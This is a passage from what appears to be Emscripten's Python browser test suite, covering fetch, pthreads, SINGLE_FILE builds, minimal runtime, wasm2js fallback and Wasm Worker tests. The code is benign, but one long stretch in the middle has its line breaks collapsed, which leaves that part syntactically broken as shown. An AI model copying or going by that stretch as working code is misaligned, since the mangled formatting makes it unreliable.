  self.btest_exit('test_preallocated_heap.cpp', args=['-sWASM=0', '-sINITIAL_MEMORY=16MB', '-sABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')])

# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
@also_with_wasm2js
def test_fetch_to_memory(self):
  # Test error reporting in the negative case when the file URL doesn't exist. (http 404)
  self.btest_exit('fetch/to_memory.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-DFILE_DOES_NOT_EXIST'])
  # Test the positive case when the file URL exists. (http 200)
  shutil.copyfile(test_file('gears.png'), 'gears.png')
  for arg in [[], ['-sFETCH_SUPPORT_INDEXEDDB=0']]:
    self.btest_exit('fetch/to_memory.cpp', args=['-sFETCH_DEBUG', '-sFETCH'] + arg)

@parameterized({
  '': ([],),
  'pthread_exit': (['-DDO_PTHREAD_EXIT'],),
})
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_from_thread(self, args):
  shutil.copyfile(test_file('gears.png'), 'gears.png')
  self.btest_exit('fetch/from_thread.cpp', args=args + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sFETCH_DEBUG', '-sFETCH', '-DFILE_DOES_NOT_EXIST'], also_wasm2js=True)

@also_with_wasm2js
def test_fetch_to_indexdb(self):
  shutil.copyfile(test_file('gears.png'), 'gears.png')
  self.btest_exit('fetch/to_indexeddb.cpp', args=['-sFETCH_DEBUG', '-sFETCH'])

# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
@also_with_wasm2js
def test_fetch_cached_xhr(self):
  shutil.copyfile(test_file('gears.png'), 'gears.png')
  self.btest_exit('fetch/cached_xhr.cpp', args=['-sFETCH_DEBUG', '-sFETCH'])

# Tests that response headers get set on emscripten_fetch_t values.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@also_with_wasm2js
@requires_threads
def test_fetch_response_headers(self):
  shutil.copyfile(test_file('gears.png'), 'gears.png')
  self.btest_exit('fetch/response_headers.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])

# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
@also_with_wasm2js
def test_fetch_stream_file(self):
  self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
  # Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
  # won't fully fit in the heap. This verifies that streaming works properly.
  s = '12345678'
  for i in range(14):
    s = s[::-1] + s # length of str will be 2^17=128KB
  with open('largefile.txt', 'w') as f:
    for i in range(1024):
      f.write(s)
  self.btest_exit('fetch/stream_file.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sINITIAL_MEMORY=536870912'])

def test_fetch_headers_received(self):
  self.btest_exit('fetch/headers_received.cpp', args=['-sFETCH_DEBUG', '-sFETCH'])

# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -sPROXY_TO_PTHREAD option.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_sync_xhr(self):
  shutil.copyfile(test_file('gears.png'), 'gears.png')
  self.btest_exit('fetch/sync_xhr.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])

# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_implicit_append(self):
  shutil.copyfile(test_file('gears.png'), 'gears.png')
  self.btest_exit('fetch/example_synchronous_fetch.c', args=['-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])

# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
  shutil.copyfile(test_file('gears.png'), 'gears.png')
  self.btest_exit('fetch/example_synchronous_fetch.c', args=['-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])

# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868') @also_with_wasm2js @requires_threads def test_fetch_sync_xhr_in_proxy_to_worker(self): shutil.copyfile(test_file('gears.png'), 'gears.png') self.btest_exit('fetch/sync_xhr.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '--proxy-to-worker']) # Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread @unittest.skip("emscripten_fetch_wait relies on an asm.js-based web worker") @requires_threads def test_fetch_sync_fetch_in_main_thread(self): shutil.copyfile(test_file('gears.png'), 'gears.png') self.btest_exit('fetch/sync_fetch_in_main_thread.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sWASM=0', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']) @requires_threads @disabled('https://github.com/emscripten-core/emscripten/issues/16746') def test_fetch_idb_store(self): self.btest_exit('fetch/idb_store.cpp', args=['-sUSE_PTHREADS', '-sFETCH', '-sWASM=0', '-sPROXY_TO_PTHREAD']) @requires_threads @disabled('https://github.com/emscripten-core/emscripten/issues/16746') def test_fetch_idb_delete(self): shutil.copyfile(test_file('gears.png'), 'gears.png') self.btest_exit('fetch/idb_delete.cpp', args=['-sUSE_PTHREADS', '-sFETCH_DEBUG', '-sFETCH', '-sWASM=0', '-sPROXY_TO_PTHREAD']) @requires_threads def test_pthread_locale(self): self.emcc_args.append('-I' + path_from_root('system/lib/libc/musl/src/internal')) self.emcc_args.append('-I' + path_from_root('system/lib/pthread')) for args in [ [], ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'], ]: print("Testing with: ", args) self.btest_exit('pthread/test_pthread_locale.c', args=args) # Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and # emscripten_get_canvas_element_size() functionality in singlethreaded programs. 
def test_emscripten_set_canvas_element_size(self): self.btest_exit('emscripten_set_canvas_element_size.c') # Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main # thread to obtain the proper window.devicePixelRatio value). @requires_threads def test_emscripten_get_device_pixel_ratio(self): for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]: self.btest_exit('emscripten_get_device_pixel_ratio.c', args=args) # Tests that emscripten_run_script() variants of functions work in pthreads. @requires_threads def test_pthread_run_script(self): for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]: self.btest_exit(test_file('pthread/test_pthread_run_script.cpp'), args=['-O3'] + args) # Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations. @requires_threads @requires_graphics_hardware def test_emscripten_animate_canvas_element_size(self): for args in [ ['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'], ['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'], ['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'], ['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'], ['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'], ['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sOFFSCREENCANVAS_SUPPORT'], ]: cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-sGL_DEBUG', '--threadprofiler', '-sASSERTIONS'] + args print(' '.join(cmd)) self.btest_exit('canvas_animate_resize.cpp', args=cmd) # Tests the absolute minimum pthread-enabled application. 
@parameterized({ '': ([],), 'O3': (['-O3'],) }) @requires_threads def test_pthread_hello_thread(self, opts): for modularize in [[], ['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]: self.btest_exit(test_file('pthread/hello_thread.c'), args=['-sUSE_PTHREADS'] + modularize + opts) # Tests that a pthreads build of -sMINIMAL_RUNTIME works well in different build modes @parameterized({ '': ([],), 'modularize': (['-sMODULARIZE', '-sEXPORT_NAME=MyModule'],), 'O3': (['-O3'],), 'O3_modularize': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule'],), 'O3_modularize_MINIMAL_RUNTIME_2': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule', '-sMINIMAL_RUNTIME=2'],), }) def test_minimal_runtime_hello_thread(self, opts): self.btest_exit(test_file('pthread/hello_thread.c'), args=['--closure=1', '-sMINIMAL_RUNTIME', '-sUSE_PTHREADS'] + opts) # Tests memory growth in pthreads mode, but still on the main thread. @requires_threads def test_pthread_growth_mainthread(self): self.emcc_args.remove('-Werror') def run(emcc_args=[]): self.btest_exit(test_file('pthread/test_pthread_memory_growth_mainthread.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=32MB', '-sMAXIMUM_MEMORY=256MB'] + emcc_args, also_wasm2js=False) run() run(['-sPROXY_TO_PTHREAD']) # Tests memory growth in a pthread. @requires_threads def test_pthread_growth(self): self.emcc_args.remove('-Werror') def run(emcc_args=[]): self.btest_exit(test_file('pthread/test_pthread_memory_growth.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=32MB', '-sMAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_wasm2js=False) run() run(['-sASSERTIONS']) run(['-sPROXY_TO_PTHREAD']) # Tests that time in a pthread is relative to the main thread, so measurements # on different threads are still monotonic, as if checking a single central # clock. 
@requires_threads
def test_pthread_reltime(self):
  self.btest_exit(test_file('pthread/test_pthread_reltime.cpp'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])

# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
  # TODO: enable this with wasm, currently pthreads/atomics have limitations
  self.set_setting('EXIT_RUNTIME')
  self.compile_btest([test_file('pthread/hello_thread.c'), '-sUSE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'], reporting=Reporting.JS_ONLY)
  shutil.copyfile(test_file('pthread/main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
  self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?exit:0')

# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
  create_file('test.c', r'''
    #include <stdio.h>
    #include <emscripten.h>
    int main() {
      return 0;
    }
  ''')
  # generate a dummy file
  create_file('dummy_file', 'dummy')
  # compile the code with the modularize feature and the preload-file option enabled
  self.compile_btest(['test.c', '-sEXIT_RUNTIME', '-sMODULARIZE', '-sEXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-sSINGLE_FILE'])
  # The page disables atob/fetch before loading the module, forcing the
  # base64-decoding fallback path.
  create_file('a.html', '''
    <script>
      atob = undefined;
      fetch = undefined;
    </script>
    <script src="a.out.js"></script>
    <script>
      var foo = Foo();
    </script>
  ''')
  self.run_browser('a.html', '...', '/report_result?exit:0')

# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
  self.btest('single_file_static_initializer.cpp', '19', args=['-sSINGLE_FILE'], also_proxied=True)
  # Everything must be embedded in the .html: no side files may exist.
  self.assertExists('test.html')
  self.assertNotExists('test.js')
  self.assertNotExists('test.worker.js')
  self.assertNotExists('test.wasm')
  self.assertNotExists('test.mem')

# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
  for wasm in [0, 1]:
    for opts in [[], ['-O3']]:
      self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-sMINIMAL_RUNTIME', '-sSINGLE_FILE', '-sWASM=' + str(wasm)])
      self.assertExists('test.html')
      # No side files may exist next to the single-file html output.
      # (a duplicated assertNotExists('test.js') check was removed here)
      self.assertNotExists('test.js')
      self.assertNotExists('test.wasm')
      self.assertNotExists('test.asm.js')
      self.assertNotExists('test.mem')
      self.assertNotExists('test.worker.js')

# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
  self.btest_exit('minimal_hello.c', args=['-sSINGLE_FILE', '-sENVIRONMENT=web', '-O2', '--closure=1'])

# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
  for wasm_enabled in [True, False]:
    args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-sSINGLE_FILE']
    if not wasm_enabled:
      args += ['-sWASM=0']
    self.compile_btest(args)
    # locateFile must never be handed a data: URI when SINGLE_FILE is used.
    create_file('test.html', '''
      <script>
        var Module = {
          locateFile: function (path) {
            if (path.indexOf('data:') === 0) {
              throw new Error('Unexpected data URI.');
            }
            return path;
          }
        };
      </script>
      <script src="test.js"></script>
    ''')
    self.run_browser('test.html', None, '/report_result?0')

# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
  self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-sSINGLE_FILE'])
  create_file('test.html', '<script src="test.js"></script>')
  self.run_browser('test.html', None, '/report_result?0')
  self.assertExists('test.js')
  self.assertNotExists('test.worker.js')

# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
  self.set_setting('EXIT_RUNTIME')
  self.compile_btest([test_file('pthread/test_pthread_atomics.cpp'), '-o', 'test.js', '-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'], reporting=Reporting.JS_ONLY)
  # Launch the whole application inside a Worker instead of the main thread.
  create_file('test.html', '''
    <script>
      new Worker('test.js');
    </script>
  ''')
  self.run_browser('test.html', None, '/report_result?exit:0')

# Tests that a preloaded file is still accessible after the heap has grown.
def test_access_file_after_heap_resize(self):
  create_file('test.txt', 'hello from file')
  self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-sALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt'])

  # with separate file packager invocation
  self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
  self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-sALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-sFORCE_FILESYSTEM'])

# Tests that a custom shell file containing non-ASCII (emoji) text is handled correctly.
def test_unicode_html_shell(self):
  create_file('main.cpp', r'''
    int main() {
      return 0;
    }
  ''')
  create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
  self.btest_exit('main.cpp', args=['--shell-file', 'shell.html'])

# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
  self.btest_exit(test_file('pthread/emscripten_thread_sleep.c'), args=['-sUSE_PTHREADS', '-sEXPORTED_RUNTIME_METHODS=[print]'])

# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
  self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
  ensure_dir('subdir')
  # Move the build products away from the page's own directory.
  shutil.move('test.js', Path('subdir/test.js'))
  shutil.move('test.wasm', Path('subdir/test.wasm'))
  src = read_file('test.html')
  # Make sure JS is loaded from subdirectory
  create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
  self.run_browser('test-subdir.html', None, '/report_result?0')

# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-sMODULARIZE`
def test_browser_run_from_different_directory_async(self):
  for args, creations in [
    (['-sMODULARIZE'], [
      'Module();', # documented way for using modularize
      'new Module();' # not documented as working, but we support it
    ]),
  ]:
    print(args)
    # compile the code with the modularize feature and the preload-file option enabled
    self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
    ensure_dir('subdir')
    shutil.move('test.js', Path('subdir/test.js'))
    shutil.move('test.wasm', Path('subdir/test.wasm'))
    for creation in creations:
      print(creation)
      # Make sure JS is loaded from subdirectory
      create_file('test-subdir.html', '''
        <script src="subdir/test.js"></script>
        <script>
          %s
        </script>
      ''' % creation)
      self.run_browser('test-subdir.html', None, '/report_result?0')

# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
  # test both modularize (and creating an instance) and modularize-instance
  # (which creates by itself)
  for path, args, creation in [
    ([], ['-sMODULARIZE'], 'Module();'),
    (['subdir'], ['-sMODULARIZE'], 'Module();'),
  ]:
    print(path, args, creation)
    filesystem_path = os.path.join('.', *path)
    ensure_dir(filesystem_path)
    # compile the code with the modularize feature and the preload-file option enabled
    self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args)
    shutil.move('test.js', Path(filesystem_path, 'test.js'))
    shutil.move('test.wasm', Path(filesystem_path, 'test.wasm'))
    # Load the JS via a synchronous XHR + eval, so document.currentScript is absent.
    create_file(Path(filesystem_path, 'test.html'), '''
      <script>
        setTimeout(function() {
          var xhr = new XMLHttpRequest();
          xhr.open('GET', 'test.js', false);
          xhr.send(null);
          eval(xhr.responseText);
          %s
        }, 1);
      </script>
    ''' % creation)
    self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')

def test_emscripten_request_animation_frame(self):
  self.btest_exit(test_file('emscripten_request_animation_frame.c'))

def test_emscripten_request_animation_frame_loop(self):
  self.btest_exit(test_file('emscripten_request_animation_frame_loop.c'))

def test_request_animation_frame(self):
  self.btest_exit('request_animation_frame.cpp', also_proxied=True)

@requires_threads
def test_emscripten_set_timeout(self):
  self.btest_exit(test_file('emscripten_set_timeout.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])

@requires_threads
def test_emscripten_set_timeout_loop(self):
  self.btest_exit(test_file('emscripten_set_timeout_loop.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])

def test_emscripten_set_immediate(self):
  self.btest_exit(test_file('emscripten_set_immediate.c'))

def test_emscripten_set_immediate_loop(self):
  self.btest_exit(test_file('emscripten_set_immediate_loop.c'))

@requires_threads
def test_emscripten_set_interval(self):
  self.btest_exit(test_file('emscripten_set_interval.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])

# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
  self.btest(test_file('emscripten_performance_now.c'), '0', args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])

@requires_threads
def test_embind_with_pthreads(self):
  self.btest_exit(test_file('embind/test_pthreads.cpp'), args=['--bind', '-pthread', '-sPTHREAD_POOL_SIZE=2'])

def test_embind_with_asyncify(self):
  self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-sASYNCIFY'])

# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
  self.btest_exit(test_file('emscripten_console_log.c'), args=['--pre-js', test_file('emscripten_console_log_pre.js')])

def test_emscripten_throw_number(self):
  self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')])

def test_emscripten_throw_string(self):
  self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')])

# Tests that Closure run in combination with -sENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
  self.btest_exit('minimal_hello.c', args=['-sENVIRONMENT=web', '-O3', '--closure=1'])

# Tests that Closure run in combination with -sENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
  self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-sENVIRONMENT=web', '-O3', '--closure=1'])

def test_no_declare_asm_module_exports_asmjs(self):
  # TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0
  self.ldflags.remove('-sCLOSURE_WARNINGS=error')
  for minimal_runtime in [[], ['-sMINIMAL_RUNTIME']]:
    self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-sDECLARE_ASM_MODULE_EXPORTS=0', '-sENVIRONMENT=web', '-O3', '--closure=1', '-sWASM=0'] + minimal_runtime)

def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
  for mode in [1, 2]:
    self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-sDECLARE_ASM_MODULE_EXPORTS=0', '-sENVIRONMENT=web', '-O3', '--closure=1', f'-sMINIMAL_RUNTIME={mode}'])

# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
  args = ['-sMINIMAL_RUNTIME=2']
  for wasm in [[], ['-sWASM=0', '--memory-init-file', '0'], ['-sWASM=0', '--memory-init-file', '1'], ['-sSINGLE_FILE'], ['-sWASM=0', '-sSINGLE_FILE']]:
    for modularize in [[], ['-sMODULARIZE']]:
      print(str(args + wasm + modularize))
      self.btest_exit('minimal_hello.c', args=args + wasm + modularize)

# Tests that -sMINIMAL_RUNTIME works well in different build modes
def test_minimal_runtime_hello_world(self):
  for args in [
    [],
    ['-sMINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'],
    ['-sMINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure=1']
  ]:
    self.btest_exit(test_file('small_hello_world.c'), args=args + ['-sMINIMAL_RUNTIME'])

@requires_threads
def test_offset_converter(self, *args):
  self.btest_exit(test_file('browser/test_offset_converter.c'), assert_returncode=1, args=['-sUSE_OFFSET_CONVERTER', '-gsource-map', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS'])

# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
  self.btest_exit(test_file('test_emscripten_unwind_to_js_event_loop.c'))

def test_wasm2js_fallback(self):
  self.set_setting('EXIT_RUNTIME')
  for args in [[], ['-sMINIMAL_RUNTIME']]:
    self.compile_btest([test_file('small_hello_world.c'), '-sWASM=2', '-o', 'test.html'] + args)

    # First run with WebAssembly support enabled
    # Move the Wasm2js fallback away to test it is not accidentally getting loaded.
    os.rename('test.wasm.js', 'test.wasm.js.unused')
    self.run_browser('test.html', 'hello!', '/report_result?exit:0')
    os.rename('test.wasm.js.unused', 'test.wasm.js')

    # Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
    html = read_file('test.html')
    html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
    # Fixed: write via a context manager instead of open(...).write(...),
    # which leaked the file handle.
    with open('test.html', 'w') as f:
      f.write(html)
    os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
    self.run_browser('test.html', 'hello!', '/report_result?exit:0')

def test_wasm2js_fallback_on_wasm_compilation_failure(self):
  self.set_setting('EXIT_RUNTIME')
  for args in [[], ['-sMINIMAL_RUNTIME']]:
    self.compile_btest([test_file('small_hello_world.c'), '-sWASM=2', '-o', 'test.html'] + args)

    # Run without the .wasm.js file present: with Wasm support, the page should still run
    os.rename('test.wasm.js', 'test.wasm.js.unused')
    self.run_browser('test.html', 'hello!', '/report_result?exit:0')

    # Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
    os.rename('test.wasm.js.unused', 'test.wasm.js')
    shutil.copyfile('test.js', 'test.wasm')
    self.run_browser('test.html', 'hello!', '/report_result?exit:0')

def test_system(self):
  self.btest_exit(test_file('system.c'))

# Tests the hello_wasm_worker.c documentation example code.
@also_with_minimal_runtime
def test_wasm_worker_hello(self):
  self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])

def test_wasm_worker_hello_minimal_runtime_2(self):
  self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS', '-sMINIMAL_RUNTIME=2'])

# Tests Wasm Workers build in Wasm2JS mode.
@also_with_minimal_runtime
def test_wasm_worker_hello_wasm2js(self):
  self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS', '-sWASM=0'])

# Tests the WASM_WORKERS=2 build mode, which embeds the Wasm Worker bootstrap JS script file to the main JS file.
@also_with_minimal_runtime
def test_wasm_worker_embedded(self):
  self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS=2'])

# Tests Wasm Worker thread stack setup
@also_with_minimal_runtime
def test_wasm_worker_thread_stack(self):
  # Exercise each STACK_OVERFLOW_CHECK level.
  for mode in [0, 1, 2]:
    self.btest(test_file('wasm_worker/thread_stack.c'), expected='0', args=['-sWASM_WORKERS', f'-sSTACK_OVERFLOW_CHECK={mode}'])

# Tests emscripten_malloc_wasm_worker() and emscripten_current_thread_is_wasm_worker() functions
@also_with_minimal_runtime
def test_wasm_worker_malloc(self):
  self.btest(test_file('wasm_worker/malloc_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])

# Tests Wasm Worker+pthreads simultaneously
@also_with_minimal_runtime
def test_wasm_worker_and_pthreads(self):
  self.btest(test_file('wasm_worker/wasm_worker_and_pthread.c'), expected='0', args=['-sWASM_WORKERS', '-pthread'])

# Tests emscripten_wasm_worker_self_id() function
@also_with_minimal_runtime
def test_wasm_worker_self_id(self):
  self.btest(test_file('wasm_worker/wasm_worker_self_id.c'), expected='0', args=['-sWASM_WORKERS'])

# Tests direct Wasm Assembly .S file based TLS variables in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_tls_wasm_assembly(self):
  self.btest(test_file('wasm_worker/wasm_worker_tls_wasm_assembly.c'), expected='42', args=['-sWASM_WORKERS', test_file('wasm_worker/wasm_worker_tls_wasm_assembly.S')])

# Tests C++11 keyword thread_local for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_cpp11_thread_local(self):
  self.btest(test_file('wasm_worker/cpp11_thread_local.cpp'), expected='42', args=['-sWASM_WORKERS'])

# Tests C11 keyword _Thread_local for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_c11__Thread_local(self):
  self.btest(test_file('wasm_worker/c11__Thread_local.c'), expected='42', args=['-sWASM_WORKERS', '-std=gnu11']) # Cannot test C11 - because of EM_ASM must test Gnu11.

# Tests GCC specific extension keyword __thread for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_gcc___thread(self):
  self.btest(test_file('wasm_worker/gcc___Thread.c'), expected='42', args=['-sWASM_WORKERS', '-std=gnu11'])

# Tests emscripten_wasm_worker_sleep()
@also_with_minimal_runtime
def test_wasm_worker_sleep(self):
  self.btest(test_file('wasm_worker/wasm_worker_sleep.c'), expected='1', args=['-sWASM_WORKERS'])

# Tests emscripten_terminate_wasm_worker()
@also_with_minimal_runtime
def test_wasm_worker_terminate(self):
  self.btest(test_file('wasm_worker/terminate_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])

# Tests emscripten_terminate_all_wasm_workers()
@also_with_minimal_runtime
def test_wasm_worker_terminate_all(self):
  self.btest(test_file('wasm_worker/terminate_all_wasm_workers.c'), expected='0', args=['-sWASM_WORKERS'])

# Tests emscripten_wasm_worker_post_function_*() API
@also_with_minimal_runtime
def test_wasm_worker_post_function(self):
  self.btest(test_file('wasm_worker/post_function.c'), expected='8', args=['-sWASM_WORKERS'])

# Tests emscripten_wasm_worker_post_function_*() API and EMSCRIPTEN_WASM_WORKER_ID_PARENT
# to send a message back from Worker to its parent thread.
@also_with_minimal_runtime
def test_wasm_worker_post_function_to_main_thread(self):
  self.btest(test_file('wasm_worker/post_function_to_main_thread.c'), expected='10', args=['-sWASM_WORKERS'])

# Tests emscripten_navigator_hardware_concurrency() and emscripten_atomics_is_lock_free()
@also_with_minimal_runtime
def test_wasm_worker_hardware_concurrency_is_lock_free(self):
  self.btest(test_file('wasm_worker/hardware_concurrency_is_lock_free.c'), expected='0', args=['-sWASM_WORKERS'])

# Tests emscripten_wasm_wait_i32() and emscripten_wasm_notify() functions.
@also_with_minimal_runtime
def test_wasm_worker_wait32_notify(self):
  self.btest(test_file('wasm_worker/wait32_notify.c'), expected='2', args=['-sWASM_WORKERS'])

# Tests emscripten_wasm_wait_i64() and emscripten_wasm_notify() functions.
@also_with_minimal_runtime
def test_wasm_worker_wait64_notify(self):
  self.btest(test_file('wasm_worker/wait64_notify.c'), expected='2', args=['-sWASM_WORKERS'])

# Tests emscripten_atomic_wait_async() function.
@also_with_minimal_runtime
def test_wasm_worker_wait_async(self):
  self.btest(test_file('wasm_worker/wait_async.c'), expected='0', args=['-sWASM_WORKERS'])

# Tests emscripten_atomic_cancel_wait_async() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_wait_async(self):
  self.btest(test_file('wasm_worker/cancel_wait_async.c'), expected='1', args=['-sWASM_WORKERS'])

